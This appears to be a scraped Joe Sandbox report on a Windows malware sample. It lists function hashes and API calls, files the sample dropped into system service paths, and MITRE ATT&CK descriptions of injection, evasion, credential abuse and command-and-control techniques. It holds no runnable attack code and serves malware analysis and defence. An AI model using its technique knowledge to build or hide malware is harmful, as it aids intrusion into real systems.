Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: ca68f18a7fa7c3bde14d10b92c765e559fdd9fc37852c13f41fffdb9c198d947
Instruction ID: a21a4701c09283d063fe79b367182633aa51a9950eb7d0e2c1ab54a0e2954309
Opcode Fuzzy Hash: ca68f18a7fa7c3bde14d10b92c765e559fdd9fc37852c13f41fffdb9c198d947
Instruction Fuzzy Hash: 36018FB1A41109ABDB11EAA5C942AFF77A8DF11301F20052FBC05732D3DE295E1DD67A

Function 0045C4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0045C534

Part of subcall function 0045C816: _memmove.LIBCMT ref: 0045C860
Part of subcall function 0045C816: VariantInit.OLEAUT32(00000000), ref: 0045C882
Part of subcall function 0045C816: VariantCopy.OLEAUT32(00000000,?), ref: 0045C88C

VariantClear.OLEAUT32(?), ref: 0045C556

Strings

d}K, xrefs: 0045C517

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Variant$Init$ClearCopy_memmove
String ID: d}K
API String ID: 2932060187-3405784397
Opcode ID: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
Instruction ID: 9b6b4eac42ae89553be157e2085c7612e92dc5081679660b2cee5bd476f3b436
Opcode Fuzzy Hash: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
Instruction Fuzzy Hash: 401130B18007089FC710DFAAC8C089AF7F8FF18314B50852FE58AD7612E734AA48CB54

Function 00464F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00464F46
_wcscmp.LIBCMT ref: 00464F58

Strings

#32770, xrefs: 00464F52

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
Instruction ID: c10ae28a8aa268df33283df1156ce4f732750d60ee08a51e76ed462bd539b068
Opcode Fuzzy Hash: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
Instruction Fuzzy Hash: 91E0D13260023837E7209B55AC45FA7F7ACDB55B71F11006BFD04D3151D5649A45C7E5

Function 0043B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0043B314: _memset.LIBCMT ref: 0043B321

Part of subcall function 00420940: InitializeCriticalSectionAndSpinCount.KERNEL32(004C4158,00000000,004C4144,0043B2F0,?,?,?,0040100A), ref: 00420945

IsDebuggerPresent.KERNEL32(?,?,?,0040100A), ref: 0043B2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040100A), ref: 0043B303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0043B2FE

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
Instruction ID: 2b780658d3da49ad9f9e4503d56df9c93059da648c8d5ac8478d33f484e7c10e
Opcode Fuzzy Hash: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
Instruction Fuzzy Hash: 02E06DB02007208BD720AF29E5047467AE4EF14308F00897EE856C7341EBB8E488CBA9

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Driver: Driver Load, File: File Creation, File: File Modification, Module: Module Load
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report I3LPkQh2an.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

C:\Users\user\AppData\Local\Temp\autB916.tmp

C:\Users\user\AppData\Local\Temp\unspawned

C:\Users\user\AppData\Roaming\a8a24eee21ca4edc.bin

C:\Windows\System32\AppVClient.exe

C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

C:\Windows\System32\FXSSVC.exe

C:\Windows\System32\alg.exe

C:\Windows\System32\config\systemprofile\AppData\Roaming\a8a24eee21ca4edc.bin

Static File Info

General

File Icon

Windows Analysis Report
I3LPkQh2an.exe

Function 00403B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Function 004049A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00404E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre